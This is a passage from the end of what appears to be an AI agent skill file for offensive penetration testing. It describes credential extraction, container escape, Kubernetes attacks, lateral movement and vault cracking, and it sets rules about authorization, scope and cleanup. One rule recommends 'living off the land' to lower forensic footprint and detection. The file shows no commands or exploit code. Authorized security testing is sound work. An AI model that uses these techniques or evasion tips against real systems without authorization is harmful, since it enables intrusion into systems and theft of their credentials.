`docs/local/audits/lockpick/<YYYY-MM-DD>-<slug>.md`. When invoked to **answer a question, teach a concept, build a new artifact, or generate content**, respond freely without the contract.356- **Severity scale:** `P0 | P1 | P2 | P3 | info` (see shared contract; only used in audit/review mode).357358## Related Skills359360- **security-audit** - defensive counterpart. Finds vulnerabilities through SAST, dependency scanning, and config review. This skill exploits them. Use security-audit for hardening; use lockpick for proving exploitability.361- **networking** - configures and troubleshoots VPNs, DNS, proxies, firewalls. Lockpick's VPN section extracts credentials and keys from existing configs for lateral movement. Use networking for setup; use lockpick for exploitation.362- **kubernetes** - writes and reviews k8s manifests and Helm charts. Lockpick's k8s section attacks the cluster from inside a compromised pod. Use kubernetes for building; use lockpick for breaking.363- **docker** - Dockerfile and Compose authoring. Lockpick's container section escapes from running containers. Use docker for building images; use lockpick for escaping them.364- **firewall-appliance** - OPNsense/pfSense firewall management. Lockpick doesn't cover network-level firewall testing.365- **ansible** - playbook and role authoring. Lockpick's IaC section targets Ansible vault cracking and credential extraction, not playbook writing.366- **terraform** - IaC authoring. Lockpick's IaC section targets state file secret extraction, not Terraform module design.367368---369370## Rules3713721. **Authorization is non-negotiable.** Every technique requires written authorization or a CTF/lab context. No exceptions, no "it's my own box" without explicit confirmation.3732. **Enumerate before exploiting.** Run through the full enumeration checklist before attempting kernel exploits or destructive techniques. The easy wins (sudo, SUID, cron) are safer and more reliable.3743. **Kernel exploits are last resort.** They can crash the system, corrupt memory, or trigger panic. Try everything else first. Test in a lab environment when possible.3754. **Document everything.** Capture command output before moving to the next technique. Evidence of the escalation path is the deliverable, not just root access.3765. **Clean up after yourself.** Track files created, users added, configs modified. Remove them at the end of the engagement or note them for the client.3776. **Don't access unnecessary data.** Proving root access doesn't require reading actual user data. A `whoami` or `/root/proof.txt` is enough.3787. **Stay in scope.** Lateral movement to systems outside the authorized boundary is out of scope unless explicitly permitted.3798. **Prefer living off the land.** Use tools already on the system before uploading custom binaries. Less forensic footprint, fewer detection triggers.